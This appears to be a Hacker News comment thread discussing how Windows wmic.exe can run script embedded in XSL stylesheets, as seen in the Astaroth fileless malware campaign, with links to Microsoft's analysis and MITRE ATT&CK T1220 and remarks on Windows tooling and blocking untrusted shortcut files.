It's worth nothing that Windows Defender stops the 'remote include' part even if there's nothing in the file (test.txt only contains the word 'blah' so we should get a parsing/stylesheet error):<p><a href="https://i.imgur.com/jP3yJNQ.jpg" rel="nofollow">https://i.imgur.com/jP3yJNQ.jpg</a>
This story appears to be related to this:<p><a href="https://news.ycombinator.com/item?id=20384519" rel="nofollow">https://news.ycombinator.com/item?id=20384519</a><p>More info (with some marketing):<p><a href="https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/?utm_source=Direct" rel="nofollow">https://www.microsoft.com/security/blog/2019/07/08/dismantli...</a>
This is something which baffles me as a +15yrs "linux guy" who thought to know what kind of ecosystem the big desktop OS brings: MS Windows is really rich in tooling, both in terms of desktop and command line tools. And there is similar bloat as with Linux: I never heard of wmic.exe before, but the fact that it can be used to manage network interfaces sounds similarly fucked up as the linux story (/sbin/ifconfig, /sbin/ip, the unloved network manager, resolv.d, etc. pp). Just to give another example: mshta.exe was basically the Electron platform but in early 2000. And it was shipped right out of the box. That's very elegant.<p>Since I have an addition to write tools which solve problems they were not intended to solve (violating Unix philosophy), I admire that wmic.exe can use XSLT to generate reports. Of course, PowerShell solves the problem of structured output in a better way. A contemporary Unix tool would simply have the option for JSON output and that's it. But including an XSL processor which even executes scripting languages... hilarious!
Before inevitabile anti-XML comments appear: the hole is due to Microsoft making it possible to execute VB code included in what were supposed to be <i>style</i>sheets. It’s like blindly eval()ing a json field: a bad idea regardless of format, and not part of the spec (if i remember correctly).
And here is a MITRE entry:<p><a href="https://attack.mitre.org/techniques/T1220/" rel="nofollow">https://attack.mitre.org/techniques/T1220/</a>
Why does it run untrusted shortcut files in the first place? That’s where you need to block, it’s clearly as bad as running executables sent through email.